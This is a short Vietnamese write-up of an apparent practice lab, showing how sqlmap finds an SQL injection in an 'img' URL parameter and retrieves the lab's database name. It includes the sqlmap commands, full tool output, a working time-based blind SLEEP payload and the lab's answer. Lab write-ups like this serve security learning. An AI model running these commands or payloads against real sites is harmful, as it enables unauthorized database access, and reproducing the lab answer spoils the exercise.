Error-Based SQL Injection Lab
Error-Based SQL Injection Lab
This lab contains a SQL injection vulnerability. To complete this lab, perform a Error-Based SQL Injection attack using “img” parameter. What is the database name?
- Tôi đã xem thử trang web và nhận thấy truy vấn ngay trong links :
https://evolved-network.europe1.hackviser.space/index.php?img=1Tham số có thể Injection là img , Tôi đã dùng sqlmap để tìm tên database của nó như những bài trước :
sqlmap -r request.txt -p img --technique=E --current-db --batchtùy chọn —technique=E là kiểu Injection Error-based , Còn —technique=T là Time-Based , dùng cách nào cũng được !
- Sau đó tôi nhận được :
┌─[root@hackerbox]─[~]
└──╼ #sqlmap -r request.txt -p img --technique=T --current-db --batch
___
__H__
___ ___[)]_____ ___ ___ {1.9.9#stable}
|_ -| . [,] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:04:26 /2025-09-24/
[11:04:26] [INFO] parsing HTTP request from 'request.txt'
[11:04:26] [INFO] testing connection to the target URL
got a 301 redirect to 'https://evolved-network.europe1.hackviser.space/index.php?img=3'. Do you want to follow? [Y/n] Y
[11:04:26] [INFO] checking if the target is protected by some kind of WAF/IPS
[11:04:26] [INFO] heuristic (basic) test shows that GET parameter 'img' might be injectable (possible DBMS: 'MySQL')
[11:04:26] [INFO] testing for SQL injection on GET parameter 'img'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[11:04:26] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[11:04:26] [WARNING] time-based comparison requires larger statistical model, please wait............................ (done)
[11:04:37] [INFO] GET parameter 'img' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[11:04:37] [INFO] checking if the injection point on GET parameter 'img' is a false positive
GET parameter 'img' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 43 HTTP(s) requests:
---
Parameter: img (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: img=3 AND (SELECT 3087 FROM (SELECT(SLEEP(5)))yaIP)
---
[11:04:58] [INFO] the back-end DBMS is MySQL
[11:04:58] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12
[11:04:58] [INFO] fetching current database
[11:04:58] [INFO] retrieved:
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[11:05:13] [INFO] adjusting time delay to 1 second due to good response times
heritage_marvels
current database: 'heritage_marvels'
[11:06:02] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/evolved-network.europe1.hackviser.space'
[*] ending @ 11:06:02 /2025-09-24/
==> Đáp án là heritage_marvels